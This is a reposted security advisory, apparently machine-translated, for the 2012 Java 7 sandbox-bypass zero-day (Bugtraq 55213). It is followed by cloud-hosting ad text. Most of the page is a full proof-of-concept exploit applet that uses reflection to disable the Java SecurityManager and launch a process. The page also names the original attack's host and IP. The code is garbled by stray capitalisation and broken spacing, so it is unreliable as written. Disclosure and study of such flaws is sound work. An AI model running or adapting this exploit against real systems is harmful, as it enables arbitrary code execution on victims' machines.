Release date:
Updated on:
Affected Systems:
Oracle Java Runtime Environment 7.x
Oracle Java Runtime Environment 1.7.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 55213
Sun Java Runtime Environment is a solution that provides a reliable Runtime Environment for JAVA applications.
Oracle JRE 7 update 6 build 1.7.0 _ 06-b24 and earlier versions have the remote code execution vulnerability, attackers can exploit this vulnerability to bypass Java sandbox restrictions and load other classes to execute arbitrary code in the application.
<* Source: 0-day
Link: http://secunia.com/advisories/50133/
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
//
// CVE-2012-XXXX Java 0day
//
// Reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
//
// Secret host/ip: OK .aa24.net/59.120.154.62
//
// Regurgitated by jduck
//
// Probably a metasploit module soon...
//
Package cve2012xxxx;
Import java. applet. Applet;
Import java. awt. Graphics;
Import java. beans. Expression;
Import java. beans. Statement;
Import java. lang. reflect. Field;
Import java.net. URL;
Import java. security .*;
Import java. security. cert. Certificate;
Public class Gondvv extends Applet
{
Public Gondvv ()
{
}
Public void disableSecurity ()
Throws Throwable
{
Statement localStatement = new Statement (System. class, "setSecurityManager", new Object [1]);
Permissions localPermissions = new Permissions ();
LocalPermissions. add (new AllPermission ());
ProtectionDomain localProtectionDomain = new ProtectionDomain (new CodeSource (new URL ("file: //"), new Certificate [0]), localPermissions );
AccessControlContext localAccessControlContext = new AccessControlContext (new ProtectionDomain [] {
LocalProtectionDomain
});
SetField (Statement. class, "acc", localStatement, localAccessControlContext );
LocalStatement.exe cute ();
}
Private Class GetClass (String paramString)
Throws Throwable
{
Object arrayOfObject [] = new Object [1];
ArrayOfObject [0] = paramString;
Expression localExpression = new Expression (Class. class, "forName", arrayOfObject );
LocalExpression.exe cute ();
Return (Class) localExpression. getValue ();
}
Private void SetField (Class paramClass, String paramString, Object paramObject1, Object paramObject2)
Throws Throwable
{
Object arrayOfObject [] = new Object [2];
ArrayOfObject [0] = paramClass;
ArrayOfObject [1] = paramString;
Expression localExpression = new Expression (GetClass ("sun. awt. SunToolkit"), "getField", arrayOfObject );
LocalExpression.exe cute ();
(Field) localExpression. getValue (). set (paramObject1, paramObject2 );
}
Public void init ()
{
Try
{
DisableSecurity ();
Process localProcess = null;
LocalProcess = runtime.getruntime(cmd.exe c ("calc.exe ");
If (localProcess! = Null );
LocalProcess. waitFor ();
}
Catch (Throwable localThrowable)
{
LocalThrowable. printStackTrace ();
}
}
Public void paint (Graphics paramGraphics)
{
ParamGraphics. drawString ("Loading", 50, 25 );
}
}
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Oracle
------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.oracle.com/technetwork/topics/security/
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
